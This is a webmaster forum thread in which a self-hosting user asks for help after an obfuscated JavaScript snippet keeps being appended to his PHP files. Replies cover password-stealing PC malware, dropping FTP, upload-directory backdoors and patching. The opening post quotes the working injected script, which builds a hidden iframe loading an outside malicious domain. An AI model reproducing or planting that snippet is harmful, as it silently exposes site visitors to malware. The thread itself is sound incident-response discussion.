Server comprimised, now what?

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • camperjohn64
    Confirmed User
    • Feb 2005
    • 1531

    #1

    Server comprimised, now what?

    I am getting this script, attached to the end of my PHP scripts all over my server:

    Code:
    <script>yd='co';mh='m';im='a.';rm='h';my='5';t='m/';qg='v';vp='if';x='me';a='p:/';gv='a';q='/r';xk='.';ei='htt';y='k';cw='9';w='s';u='8';dk='ra';f='ytv';iy='e';l='jus';b='ew';hh='rc';h='t';vu=vp.concat(dk,x);qm=w.concat(hh);ka=ei.concat(a,q,b,gv,l,iy,qg,im,yd,t,y,cw,u,my,f,xk,rm,h,mh);var tq=document.createElement(vu);tq.setAttribute('width','1');tq.setAttribute('height','1');tq.frameBorder=0;tq.setAttribute(qm,ka);document.body.appendChild(tq);</script>
    I wrote a script to delete it, changed the passwords, but it's still showing up ever xxx hours.

    Now what??!!?!!

    1) How can I find if the server is comprimised?

    2) How can I find if it's a script on my server that is automatically adding it?

    3) What to do??

    JM

    Here is what I find on the net about that script:

    http://blog.unmaskparasites.com/2011...ction-k985ytv/
    Last edited by camperjohn64; 08-25-2011, 08:09 AM.
    www.gimmiegirlproductions.com
  • bronco67
    Too lazy to set a custom title
    • Dec 2006
    • 29032

    #2
    Your spelling skills have been compromised. Sorry, I couldn't resist.

    Comment

    • 96ukssob
      So Fucking Banananananas
      • Mar 2003
      • 12991

      #3
      sounds like you have a virus on your server, not that someone hacked it. had this happen a few years ago with a shitty host and had the same problem.

      ask your host to run a virus scan or install some virus software. change all passwords, including root and disable SSH users (only 1 if you use it) and make sure if you have a way to upload files to one of your sites (i.e. videos) that you only allow certain formats and exclude .exe, etc, files.
      Email: Clicky on Me

      Comment

      • baddog
        So Fucking Banned
        • Apr 2001
        • 107089

        #4
        Contact your host.

        Comment

        • Klen
          • Aug 2006
          • 32235

          #5
          You should be able to figure out that by yourself,i mean you are hardcore programmer so you should be more qualified then me for example Unless i mistaken you for someone else

          Comment

          • bns666
            Confirmed Fetishist
            • Mar 2005
            • 11554

            #6
            btw also check your win pc/laptop where you have saved ftp/ssh access passwords for your server, problem might be there, not on the server.

            happened to me few years ago.
            CAM SODASTRIPCHAT
            CHATURBATEX LOVE CAM

            Comment

            • scuba steve
              Confirmed User
              • Oct 2008
              • 1888

              #7
              hosting company should be able to fix/remedy it

              isprime is always on top of this for us, most companies are

              Comment

              • Connor
                Confirmed User
                • Feb 2003
                • 1294

                #8
                Who does your sys admin? You can hire someone if you have the budget for it.


                YNOT v5 IS NOW LIVE! | SEEN YNOT MAIL YET?

                Comment

                • camperjohn64
                  Confirmed User
                  • Feb 2005
                  • 1531

                  #9
                  Originally posted by bronco67
                  Your spelling skills have been compromised. Sorry, I couldn't resist.
                  Thanks.

                  I changed all passwords, disabled most ssh access. I read it is a FTP stolen password problem, so perhaps changing passwords will fix.

                  The real problem is, I am the host, and this is my first co-located server. I sense a learning experience coming on...
                  www.gimmiegirlproductions.com

                  Comment

                  • rowan
                    Too lazy to set a custom title
                    • Mar 2002
                    • 17393

                    #10
                    If you're lucky it's just a script hole rather than a full blown server compromise. The code keeps reappearing because you're treating the symptom (deleting the code) rather than the problem (how they're creating that code)

                    Your host should be the first step in asking for help. Ask if any unusual IPs have accessed your account via FTP. They may also be able to check web server logs for suspicious activity.

                    As the article you linked suggests, the problem may be related to your own computer, ie something running in the background and sniffing passwords.

                    Comment

                    • rowan
                      Too lazy to set a custom title
                      • Mar 2002
                      • 17393

                      #11
                      Originally posted by camperjohn64
                      The real problem is, I am the host, and this is my first co-located server. I sense a learning experience coming on...
                      Ok, well that complicates things a bit. Do you know anything about server admin? And I don't mean clicking buttons on a control panel webpage...

                      Comment

                      • raymor
                        Confirmed User
                        • Oct 2002
                        • 3745

                        #12
                        The second half of this page will give you a general outline as to how to
                        secure you server - fixing stupid default PHP settings, getting rid of unused scripts,
                        turning off suexec for sure, etc.:

                        https://bettercgi.com/strongbox/pass...adyhacked.html

                        Of course there have been 1,200 page books written on the topic, so that one page
                        isn't comprehensive. You may need to talk to someone who has read the 1200 page books.
                        If they can;t get it, talk to someone who has WRITTEN one of the 1200 page books.
                        For historical display only. This information is not current:
                        support&#64;bettercgi.com ICQ 7208627
                        Strongbox - The next generation in site security
                        Throttlebox - The next generation in bandwidth control
                        Clonebox - Backup and disaster recovery on steroids

                        Comment

                        • camperjohn64
                          Confirmed User
                          • Feb 2005
                          • 1531

                          #13
                          Originally posted by rowan
                          Ok, well that complicates things a bit. Do you know anything about server admin? And I don't mean clicking buttons on a control panel webpage...
                          Yes, actually I don't use a control panel. I wanted to make sure I learned all the linux command line issues from the ground up. I have webmin, but never use it. Maybe I should disable that.

                          I have updated all software, changed all passwords, no suexec, changed ports for ssh, turned off all default settings for apache / php / phpmyadmin.

                          The server is at 67.21.112.158...please test if you can get in or there is something I should fix asap.

                          Oops, first thing is to change the default welcome page. :-(
                          www.gimmiegirlproductions.com

                          Comment

                          • camperjohn64
                            Confirmed User
                            • Feb 2005
                            • 1531

                            #14
                            Originally posted by rowan
                            If you're lucky it's just a script hole rather than a full blown server compromise. The code keeps reappearing because you're treating the symptom (deleting the code) rather than the problem (how they're creating that code)
                            ...
                            I think this is the case. On accounts that I have changed the passwords on, it *appears to no longer be infecting those accounts.

                            I'm a good php progammer, but a lousy admin.
                            www.gimmiegirlproductions.com

                            Comment

                            • PornDiscounts-R
                              Confirmed User
                              • Aug 2006
                              • 1272

                              #15
                              Originally posted by camperjohn64
                              I think this is the case. On accounts that I have changed the passwords on, it *appears to no longer be infecting those accounts.

                              I'm a good php progammer, but a lousy admin.
                              The url in your sig is giving a nice big trojan warning too
                              Email# rasmus(you*know)porndiscounts.com

                              Comment

                              • camperjohn64
                                Confirmed User
                                • Feb 2005
                                • 1531

                                #16
                                Originally posted by thebestamateur
                                The url in your sig is giving a nice big trojan warning too
                                Thank you. Fixing.

                                I think I will turn off proftp for a few hours and see if the script appears. This will confirm if its getting in through that.
                                www.gimmiegirlproductions.com

                                Comment

                                • Babaganoosh
                                  ♥♥♥ Likes Hugs ♥♥♥
                                  • Nov 2001
                                  • 15841

                                  #17
                                  FTP? Yikes, don't use FTP. Remove any ftp daemon on the box and use SSH.
                                  I like pie.

                                  Comment

                                  • iamtam
                                    So Fucking Banned
                                    • Feb 2010
                                    • 1211

                                    #18
                                    it probably isn't ftp. it is probably some out of date software on your machine with an sql injection or overflow that allows them to access your machine. check all software you use (like wordpress, phpmyadmin, or others) for more recent updates. check for files with 777 permissions, which is always a problem and check things like upload directories for .jpg.php files (which usually pass sanitizers).

                                    Comment

                                    • CYF
                                      Coupon Guru
                                      • Mar 2009
                                      • 10973

                                      #19
                                      there is malware for PCs that will use your stored FTP passwords and upload crap to your servers. Might want to check into that as well.
                                      Webmaster Coupons Coupons and discounts for hosting, domains, SSL Certs, and more!
                                      AmeriNOC Coupons | Certified Hosting Coupons | Hosting Coupons | Domain Name Coupons

                                      Comment

                                      • Babaganoosh
                                        ♥♥♥ Likes Hugs ♥♥♥
                                        • Nov 2001
                                        • 15841

                                        #20
                                        Are you a filezilla user by chance? This is something they're faced with more and more often.
                                        I like pie.

                                        Comment

                                        • camperjohn64
                                          Confirmed User
                                          • Feb 2005
                                          • 1531

                                          #21
                                          Originally posted by CYF
                                          there is malware for PCs that will use your stored FTP passwords and upload crap to your servers. Might want to check into that as well.
                                          I think this was the case. I reformatted my main machine about two weeks ago because "something funny" was going on. That was the only machine that I was using to upload to the sites that were hacked.

                                          So the root SSH was not comprimised, nor were any accounts for friends that I am hosting. Suggesting, the problem was that machine was freely sending out passwords.

                                          All accounts changed, new machine has new virus software on it, server "appears" stable as of 10am...

                                          The good thing is that it appears my home machine was hacked, not the server itself. Also, I don't have any ability to FTP to any sites that are important. Only ssh on non-standard ports.

                                          I will disable remote-root password ability once this blows over. Must login to another account, then su if I want to get to root - I forget what that feature is called.
                                          www.gimmiegirlproductions.com

                                          Comment

                                          • livexxx
                                            Confirmed User
                                            • May 2005
                                            • 1201

                                            #22
                                            quite often someone will have uploaded a script somehow onto the server that is sitting in an image upload dir or some other directory. They can then call that up every now and then and it just fires off and scans all your dirs and adds that script to the end of files. So changing your passwords etc is like after the horse has bolted. try doing something like scan all your files for some of those data patterns providing they didnt encrypt their upload.
                                            http://www.webcamalerts.com for auto tweets for web cam operators

                                            Comment

                                            • CYF
                                              Coupon Guru
                                              • Mar 2009
                                              • 10973

                                              #23
                                              Originally posted by camperjohn64
                                              I will disable remote-root password ability once this blows over. Must login to another account, then su if I want to get to root - I forget what that feature is called.
                                              are you talking about using public keys instead of passwords? That's what I do on my machines.

                                              I would also suggest not using ftp anymore. sftp is so much better. Also would recommend against storing passwords anywhere.
                                              Webmaster Coupons Coupons and discounts for hosting, domains, SSL Certs, and more!
                                              AmeriNOC Coupons | Certified Hosting Coupons | Hosting Coupons | Domain Name Coupons

                                              Comment

                                              • camperjohn64
                                                Confirmed User
                                                • Feb 2005
                                                • 1531

                                                #24
                                                Originally posted by livexxx
                                                quite often someone will have uploaded a script somehow onto the server that is sitting in an image upload dir or some other directory. They can then call that up every now and then and it just fires off and scans all your dirs and adds that script to the end of files. So changing your passwords etc is like after the horse has bolted. try doing something like scan all your files for some of those data patterns providing they didnt encrypt their upload.
                                                I turned off proftpd and the script is still being added to the files. This means it isn't a ftp upload / password issue. The horse has bolted.

                                                This means the server, is infected with something.

                                                It seems this will be my project for tonight. Must eat dinner now, but will try to find it.

                                                Thoughts?
                                                www.gimmiegirlproductions.com

                                                Comment

                                                • HomerSimpson
                                                  Too lazy to set a custom title
                                                  • Sep 2005
                                                  • 13826

                                                  #25
                                                  now you hire me...

                                                  www.awmzone.com/services
                                                  Make a bank with Chaturbate - the best selling webcam program
                                                  Ads that can't be block with AdBlockers !!! /// Best paying popup program (Bitcoin payouts) !!!

                                                  PHP, MySql, Smarty, CodeIgniter, Laravel, WordPress, NATS... fixing stuff, server migrations & optimizations... My ICQ: 27429884 | Email:

                                                  Comment

                                                  Working...